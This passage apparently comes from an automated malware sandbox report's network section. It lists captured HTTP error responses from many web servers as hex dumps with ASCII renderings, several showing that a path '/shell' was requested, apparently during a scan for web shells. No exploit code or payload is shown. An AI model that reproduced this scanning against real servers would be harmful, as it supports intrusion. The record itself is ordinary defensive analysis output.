2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">b7a4a90-990f-9817-78e4-c045e1d89b2e</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:09:30 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:32 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:31 GMTContent-Length: 4880Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Mon, 01 Nov 2021 09:09:33 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 01 Nov 2021 09:09:34 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 979Date: Mon, 01 Nov 2021 09:09:34 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 36 38 20 28 55 62 75 6e 74 75 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 73 68 65 6c 6c 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 73 68 65 6c 6c 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:34 GMTServer: Apache/2.4.48 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.48 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Mon, 01 Nov 2021 09:09:37 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 04:09:37 GMTX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockContent-Length: 181Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=8, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /shell</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:38 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 06:09:37 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:38 GMTContent-Length: 3257Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65
